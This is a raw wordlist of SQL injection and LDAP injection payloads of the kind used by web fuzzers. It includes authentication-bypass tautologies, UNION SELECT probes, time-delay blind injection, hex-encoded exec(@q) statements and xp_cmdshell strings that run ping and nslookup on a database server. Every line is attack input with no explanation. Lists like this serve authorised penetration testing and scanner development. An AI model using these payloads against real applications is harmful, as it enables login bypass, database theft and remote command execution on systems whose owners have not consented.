!
"
#
&
'
(
)
*/*
*|
-
--
--';
/
//
//*
<>"'%;)(&+
?
|
0 or 1=1
1 or 1=1
1;SELECT%20*
1 waitfor delay '0:0:10'--
'%20--
'%20;
=%20'
=%20--
=%20;
%20$(sleep%2050)
'%20or%20''='
'%20or%201=1
"%20or%20"x"="x
%20or%20x=x
'%20or%20'x'='x
')%20or%20('x'='x
%20'sleep%2050'
%21
23 OR 1=1
%26
%27%20or%201=1
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
a'
admin'--
anything' OR 'x'='x
"a"" or 1=1--"
a' or 1=1--
"a"" or 3=3--"
a' or 3=3--
a' or 'a' = 'a
&apos;%20OR
as
asc
a' waitfor delay '0:0:10'--
bfilename
char%4039%41%2b%40SELECT
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 
delete
desc
distinct
'; exec master..xp_cmdshell
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
exec sp
exec xp
'; exec xp_regread
handler
having
hi or 1=1 --"
hi" or 1=1 --
hi' or 1=1 --
"hi"") or (""a""=""a"
hi or a=a
hi" or "a"="a
hi") or ("a"="a
hi' or 'a'='a
hi') or ('a'='a
'hi' or 'x'='x';
insert
like
limit
&lt;&gt;&quot;'%;)(&amp;+
*(|(mail=*))
*(|(objectclass=*))
' or ''='
or
 or 0=0 #"
" or 0=0 #
" or 0=0 --
' or 0=0 #
' or 0=0 --
or 0=0 #
or 0=0 --
"' or 1 --'"
' or 1 --'
" or 1=1--
' or '1'='1'--
' or 1=1
' or 1=1--
or 1=1--
 or 1=1 or ""=
" or 1=1 or ""="
' or 1=1 or ''='
or%201=1
or%201=1 --
'or%20select *
' or 3=3
 or a = a
 or a=a
" or "a"="a
") or ("a"="a
' or a=a--
') or ('a'='a
) or (a=a
order by
' or (EXISTS)
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
PRINT
PRINT @@variable
procedure
replace
select
' (select top 1
--sp_password
'sqlattempt1
(sqlattempt2)
t'exec master..xp_cmdshell 'nslookup www.google.com'--
to_timestamp_tz
truncate
tz_offset
' UNION ALL SELECT
' UNION SELECT
update
'||UTL_HTTP.REQUEST
,@variable
@variable
\x23
\x27
\x27UNION SELECT
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
\x3D%20\x27
\x3D%20\x3B'
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND email IS NULL; --
x' AND members.email IS NULL; --
x' AND userid IS NULL; --
x' or 1=1 or 'x'='y
x' OR full_name LIKE '%Bob%
